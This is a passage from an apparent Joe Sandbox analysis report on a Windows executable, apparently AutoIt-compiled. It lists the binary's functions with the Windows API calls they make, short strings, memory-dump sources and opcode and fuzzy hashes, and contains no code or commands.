String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: 3cd0e548ecede2134b64ab95bca11586a159a83bf4f9e3113b0cbd9bc7e955c7
Instruction ID: a682284914f634ca4baf4ddad5b7cf1d98e4dbdb663d7f1f1986540cce979de0
Opcode Fuzzy Hash: 3cd0e548ecede2134b64ab95bca11586a159a83bf4f9e3113b0cbd9bc7e955c7
Instruction Fuzzy Hash: 7D91A031E04219ABDF24DFA1CC58FEEB7B8EF45720F108119F515AB280D7B0A985DBA0

Function 00F1975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 00EF710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EF7044,80070057,?,?,?,00EF7455), ref: 00EF7127
Part of subcall function 00EF710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EF7044,80070057,?,?), ref: 00EF7142
Part of subcall function 00EF710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EF7044,80070057,?,?), ref: 00EF7150
Part of subcall function 00EF710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EF7044,80070057,?), ref: 00EF7160

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00F19806
_memset.LIBCMT ref: 00F19813
_memset.LIBCMT ref: 00F19956
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00F19982
CoTaskMemFree.OLE32(?), ref: 00F1998D

Strings

NULL Pointer assignment, xrefs: 00F199DB

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: 5003f03f88d6a740da522558c9eab21b06dc3a3c33335b6fc53bc8ab0ac15e1f
Instruction ID: 73a1a4b2d7beee80e829ecbeb49982b2a515feb83a6b79377b60fded3093c96b
Opcode Fuzzy Hash: 5003f03f88d6a740da522558c9eab21b06dc3a3c33335b6fc53bc8ab0ac15e1f
Instruction Fuzzy Hash: 93913A71D04219EBDB10DFA4DC51EDEBBB9AF09320F10416AF519BB281DB71AA44DFA0

Function 00F26D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00F26E24
SendMessageW.USER32(?,00001036,00000000,?), ref: 00F26E38
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00F26E52
_wcscat.LIBCMT ref: 00F26EAD
SendMessageW.USER32(?,00001057,00000000,?), ref: 00F26EC4
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00F26EF2

Strings

SysListView32, xrefs: 00F26DF6

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 372526209e33f813ca00bb39c9545b60f0c206ef30d5ccae69047f6c47b4c005
Instruction ID: 56a152da47a1276b0dc494ed11c9d49523bf1efc6ddde93c8e4e9b52f6385ad8
Opcode Fuzzy Hash: 372526209e33f813ca00bb39c9545b60f0c206ef30d5ccae69047f6c47b4c005
Instruction Fuzzy Hash: E141C171A00318AFDB219FA4DC85BEE77F8EF08760F10046AF584E7291D7719D89AB64

Function 00F1E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00F03C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00F03C7A
Part of subcall function 00F03C55: Process32FirstW.KERNEL32(00000000,?), ref: 00F03C88
Part of subcall function 00F03C55: CloseHandle.KERNEL32(00000000), ref: 00F03D52

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F1E9A4
GetLastError.KERNEL32 ref: 00F1E9B7
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F1E9E6
TerminateProcess.KERNEL32(00000000,00000000), ref: 00F1EA63
GetLastError.KERNEL32(00000000), ref: 00F1EA6E
CloseHandle.KERNEL32(00000000), ref: 00F1EAA3

Strings

SeDebugPrivilege, xrefs: 00F1E9C2

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: f263f084abbf4fc55d5bfb0bc22b1b780f4b5bdeac7bf2154a07fecf91b04739
Instruction ID: 9a9cfd6a2a5b8dabfb125f9d589230b90a7603c8d78f3d8c91b5fcdcbb8f32e2
Opcode Fuzzy Hash: f263f084abbf4fc55d5bfb0bc22b1b780f4b5bdeac7bf2154a07fecf91b04739
Instruction Fuzzy Hash: 2F41BE316002059FDB24EF54CC95FAEBBE5AF45710F148458FA02AF2D2CB78AC49EB91

Function 00F02F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00F03033

Strings

warning, xrefs: 00F0301C
info, xrefs: 00F02FD4
question, xrefs: 00F02FEC
blank, xrefs: 00F02FB5
stop, xrefs: 00F03004

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: edef7f07477578fe5623aae8c70d4991ed61d0bf949101e79d607df0ca7c929f
Instruction ID: bfac1ad8c9b547947f727f606486868d2e918915043ca8d7118d62f26981b737
Opcode Fuzzy Hash: edef7f07477578fe5623aae8c70d4991ed61d0bf949101e79d607df0ca7c929f
Instruction Fuzzy Hash: DE115736749386BEEB159A14DC42E6B77AC9F153B4F20002EFB00B61C1EBB19F0576A5

Function 00F042F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00F04312
LoadStringW.USER32(00000000), ref: 00F04319
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00F0432F
LoadStringW.USER32(00000000), ref: 00F04336
_wprintf.LIBCMT ref: 00F0435C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00F0437A

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00F04357

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: c56cb9f359d09eb7400c05e674a97666ce09f07b90c1919b2bf44d21a28d7377
Instruction ID: cc5e0435ad3cb885575153026848017a83d1da26d09d19c1a2270e62fed49069
Opcode Fuzzy Hash: c56cb9f359d09eb7400c05e674a97666ce09f07b90c1919b2bf44d21a28d7377
Instruction Fuzzy Hash: 48014FF290020CBFE72197A0DD89EEA777CEB08701F4005B5BB45E2051EA759E8A6B71

Function 00F2D43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00EA2612: GetWindowLongW.USER32(?,000000EB), ref: 00EA2623

GetSystemMetrics.USER32(0000000F), ref: 00F2D47C
GetSystemMetrics.USER32(0000000F), ref: 00F2D49C
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00F2D6D7
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00F2D6F5
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00F2D716
ShowWindow.USER32(00000003,00000000), ref: 00F2D735
InvalidateRect.USER32(?,00000000,00000001), ref: 00F2D75A
DefDlgProcW.USER32(?,00000005,?,?), ref: 00F2D77D

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: 0c8c68a09b80f6f0e2c4a168396e786e8f6c45b8094c95b06d39709610bd8091
Instruction ID: 2f006b8a9ef91266251ebf55084e5a98d4539a0cb5004f1a54ac5af1fd8fffca
Opcode Fuzzy Hash: 0c8c68a09b80f6f0e2c4a168396e786e8f6c45b8094c95b06d39709610bd8091
Instruction Fuzzy Hash: 84B19A71A00229EFDF18CF68D985BAD7BB1FF04711F088069EC48AF295D774A954EB90

Function 00EA2A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00EDC1C7,00000004,00000000,00000000,00000000), ref: 00EA2ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00EDC1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00EA2B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00EDC1C7,00000004,00000000,00000000,00000000), ref: 00EDC21A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00EDC1C7,00000004,00000000,00000000,00000000), ref: 00EDC286

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 535fb939632e10c9fc3bed3247cc3b96cb8eab9d037a26b98c4929efa98f15a6
Instruction ID: 793503b784c36973c6f30b753b21f4450583d4a5ecfcf135165e424aa8b8da89
Opcode Fuzzy Hash: 535fb939632e10c9fc3bed3247cc3b96cb8eab9d037a26b98c4929efa98f15a6
Instruction Fuzzy Hash: 3B412E316146819BC7358B2C9C88B6B7BA2EF4F314F24A41DE2477E571C675B846E710

Function 00F070C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00F070DD

Part of subcall function 00EC0DB6: std::exception::exception.LIBCMT ref: 00EC0DEC
Part of subcall function 00EC0DB6: __CxxThrowException@8.LIBCMT ref: 00EC0E01

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00F07114
EnterCriticalSection.KERNEL32(?), ref: 00F07130
_memmove.LIBCMT ref: 00F0717E
_memmove.LIBCMT ref: 00F0719B
LeaveCriticalSection.KERNEL32(?), ref: 00F071AA
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00F071BF
InterlockedExchange.KERNEL32(?,000001F6), ref: 00F071DE

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: 5aef6d865296351e24e4812178db02788c7b5c0a69c6cb15a9c261f098d98301
Instruction ID: 77675d3ac67cec914c64c728aed8fdee2ee1dc13c3bc74ba9384567873db1c52
Opcode Fuzzy Hash: 5aef6d865296351e24e4812178db02788c7b5c0a69c6cb15a9c261f098d98301
Instruction Fuzzy Hash: B3315031900205EBCF10EFA4DD85EAE77B8EF45710F1441B9F904AB296D771AE15EB60

Function 00F261D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00F261EB
GetDC.USER32(00000000), ref: 00F261F3
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F261FE
ReleaseDC.USER32(00000000,00000000), ref: 00F2620A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00F26246
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00F26257
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00F2902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00F26291
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00F262B1

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 0b3e37f2c29703fdf68c395c0f4374b5369a0301a86a2cc9b466b3a46618abcb
Instruction ID: c69d891cdbfa44e8bfe776951e406923ad57845a885d73e26f5fe3620b9976df
Opcode Fuzzy Hash: 0b3e37f2c29703fdf68c395c0f4374b5369a0301a86a2cc9b466b3a46618abcb
Instruction Fuzzy Hash: 37318D72111214BFEF218F50DC8AFEA3FA9EF49761F040065FE08DA191C6759846DB60

Function 00EFBBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00EFBBC4
_memcmp.LIBCMT ref: 00EFBBE6
_memcmp.LIBCMT ref: 00EFBBFE
_memcmp.LIBCMT ref: 00EFBC11
_memcmp.LIBCMT ref: 00EFBC2B
_memcmp.LIBCMT ref: 00EFBC3E
_memcmp.LIBCMT ref: 00EFBC56
_memcmp.LIBCMT ref: 00EFBC71

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: be89631dd3edd8f8e391714e488ad66729298965901239d8f8371a4604c61f99
Instruction ID: 63fd87de71b397e27f0db74a7a79f6b0c4f0fb983975039ad10e14a951813e2e
Opcode Fuzzy Hash: be89631dd3edd8f8e391714e488ad66729298965901239d8f8371a4604c61f99
Instruction Fuzzy Hash: CE21A47160130D7BF6086A11DE42FFBB79DAE153ACF046024FF04B6647EB65DE1292A2

Function 00F0EB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00EA9837: __itow.LIBCMT ref: 00EA9862
Part of subcall function 00EA9837: __swprintf.LIBCMT ref: 00EA98AC

Part of subcall function 00EBFC86: _wcscpy.LIBCMT ref: 00EBFCA9

_wcstok.LIBCMT ref: 00F0EC94
_wcscpy.LIBCMT ref: 00F0ED23
_memset.LIBCMT ref: 00F0ED56

Strings

X, xrefs: 00F0ED93

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 1b6d9df3851e1c59ee40157465d6641c11667fd4b31ae9cb0c9eda99d31aaf5a
Instruction ID: dfda4845d42ed905825ac69fd851322290a069518cc1412722e89f35aa087b0d
Opcode Fuzzy Hash: 1b6d9df3851e1c59ee40157465d6641c11667fd4b31ae9cb0c9eda99d31aaf5a
Instruction Fuzzy Hash: 78C16F715083019FC714EF24C841A5BB7E4FF8A310F00592DF999AB2A2DB31EC45EB52

Function 00F16B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00F16C00
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00F16C21
WSAGetLastError.WSOCK32(00000000), ref: 00F16C34
htons.WSOCK32(?,?,?,00000000,?), ref: 00F16CEA
inet_ntoa.WSOCK32(?), ref: 00F16CA7

Part of subcall function 00EFA7E9: _strlen.LIBCMT ref: 00EFA7F3
Part of subcall function 00EFA7E9: _memmove.LIBCMT ref: 00EFA815

_strlen.LIBCMT ref: 00F16D44
_memmove.LIBCMT ref: 00F16DAD

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: 8873918a4a0102f87348a3c50167064dc2dce5c03d1eb1d472fa67e7ae58b166
Instruction ID: 746f85dfa9ff6f0387a69e566a64155bb70e2037655ae293ef83e335226222eb
Opcode Fuzzy Hash: 8873918a4a0102f87348a3c50167064dc2dce5c03d1eb1d472fa67e7ae58b166
Instruction Fuzzy Hash: 7981E472604300ABC710EB24DC81FABB7E8AF89724F10592DF955AB2D2DB70ED45DB52

Function 00EA1424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e10844ce346c49f9aa7f016544eb6ef91bd6b2bcbfaa820da312b5359fc8d38
Instruction ID: af4fa215ba2e5f6289ce8d929ca51bfb7af140681d2b766dc57e3fc91c4ccf5a
Opcode Fuzzy Hash: 6e10844ce346c49f9aa7f016544eb6ef91bd6b2bcbfaa820da312b5359fc8d38
Instruction Fuzzy Hash: B3718D34904119EFCB14CF98CC48ABEBBB9FF8A314F148199F915BA251D730AA52CB64

Function 00F2B351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(016B5DA8), ref: 00F2B3EB
IsWindowEnabled.USER32(016B5DA8), ref: 00F2B3F7
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00F2B4DB
SendMessageW.USER32(016B5DA8,000000B0,?,?), ref: 00F2B512
IsDlgButtonChecked.USER32(?,?), ref: 00F2B54F
GetWindowLongW.USER32(016B5DA8,000000EC), ref: 00F2B571
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00F2B589

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: e9dd4a845cf79dacc9d55f73459d9bd391e622dbf0fcd91ec056931578b55cb1
Instruction ID: 147880c081a1c0bd654a4214e4243b4d9bab0802ea0af7ce5ecc4907a56a0ec9
Opcode Fuzzy Hash: e9dd4a845cf79dacc9d55f73459d9bd391e622dbf0fcd91ec056931578b55cb1
Instruction Fuzzy Hash: 7C718F34A05224AFDB24EF64E8D4FBA7BB5EF09320F144069EE5597262C731AD41EB50

Function 00F1F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F1F448
_memset.LIBCMT ref: 00F1F511
ShellExecuteExW.SHELL32(?), ref: 00F1F556

Part of subcall function 00EA9837: __itow.LIBCMT ref: 00EA9862
Part of subcall function 00EA9837: __swprintf.LIBCMT ref: 00EA98AC

Part of subcall function 00EBFC86: _wcscpy.LIBCMT ref: 00EBFCA9

GetProcessId.KERNEL32(00000000), ref: 00F1F5CD
CloseHandle.KERNEL32(00000000), ref: 00F1F5FC

Strings

@, xrefs: 00F1F525

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: f845bbd845dcd7b64282f16f9bf21beeeca4aea4dc7e0c55aaf8e4ba8a045d2a
Instruction ID: f96609ff738176fb1b6948f1a14af1216e1eb86e6971d65ea1732dca0585b496
Opcode Fuzzy Hash: f845bbd845dcd7b64282f16f9bf21beeeca4aea4dc7e0c55aaf8e4ba8a045d2a
Instruction Fuzzy Hash: E661BE71A00619DFCB14DFA4C8819AEBBF5FF49320F148069E85ABB351CB34AD85DB90

